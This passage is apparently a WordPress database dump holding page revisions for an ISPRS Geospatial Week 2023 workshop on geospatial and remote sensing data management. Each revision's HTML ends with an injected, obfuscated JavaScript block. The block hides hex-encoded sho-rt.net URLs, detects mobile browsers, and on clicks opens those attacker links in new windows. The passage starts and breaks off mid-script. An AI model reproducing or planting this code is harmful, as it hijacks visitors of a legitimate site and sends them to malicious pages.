x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:36:18','2022-11-04 20:36:18','',2993,'https://gsw2023.com/?p=3001',0,'revision','',0),
(3002,1,'2022-11-04 20:42:17','2022-11-04 20:42:17','[vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\r\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:42:17','2022-11-04 20:42:17','',2993,'https://gsw2023.com/?p=3002',0,'revision','',0),
(3003,1,'2022-11-04 20:44:06','2022-11-04 20:44:06','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"55\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 